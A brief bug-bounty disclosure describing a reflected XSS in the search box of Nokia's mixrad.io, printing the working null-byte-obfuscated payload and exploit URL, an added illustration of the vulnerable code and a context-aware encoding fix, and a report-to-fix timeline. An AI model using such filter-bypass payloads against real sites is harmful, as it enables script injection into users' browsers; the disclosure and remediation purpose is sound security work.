My first valid XSS bug submission to Nokia was a textbook example of a reflected Cross-Site Scripting vulnerability.
Abusing the “Search” box with the payload below was enough, although it worked only in Internet Explorer:
</script><script/%00%00v%00%00>alert('http://lubi.cz')</script>
After visiting the following URL, the JavaScript code was executed:
http://www.mixrad.io/pl/pl/search/?domain=music&q=</script><script/%00%00v%00%00>alert('http://lubi.cz')</script>
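The fix for this class of bug is context-aware output encoding. The following is an added example, not code from the affected site or from the original post. It assumes the `q` value was echoed into a string inside an inline script block, which the payload's leading `</script>` suggests but the post does not show; all function names are hypothetical.

```javascript
// Added illustration; not code from the affected site.
// Assumption: the search term is echoed into a string in an inline <script>.

// Constructed input: the payload from the post, URL-decoded (%00 becomes NUL).
const payload = decodeURIComponent(
  "</script><script/%00%00v%00%00>alert('http://lubi.cz')</script>"
);

// Vulnerable pattern: raw concatenation into the script block.
// The HTML parser ends the block at the first "</script", whatever the
// JavaScript quoting looks like, so the rest is parsed as new markup.
function renderNaive(q) {
  return "<script>var searchTerm = '" + q + "';</script>";
}

// Hardened: serialize as a JS string literal (JSON.stringify also turns
// NUL into \u0000), then escape the characters the HTML parser or the
// JS line-terminator rules treat specially.
function jsStringForInlineScript(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

function renderSafe(q) {
  return "<script>var searchTerm = " + jsStringForInlineScript(q) + ";</script>";
}

// Counts how many script end tags the HTML parser would see.
function countScriptCloses(html) {
  return (html.match(/<\/script/gi) || []).length;
}

console.log("naive closes:", countScriptCloses(renderNaive(payload)));
console.log("safe closes: ", countScriptCloses(renderSafe(payload)));
console.log(renderSafe(payload));
```

The encoded literal still evaluates to the original search term, so the search feature keeps working while the markup characters never reach the HTML parser.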
Timeline:
[November 30th 2013] - bug was reported
[January 3rd 2014] - bug was fixed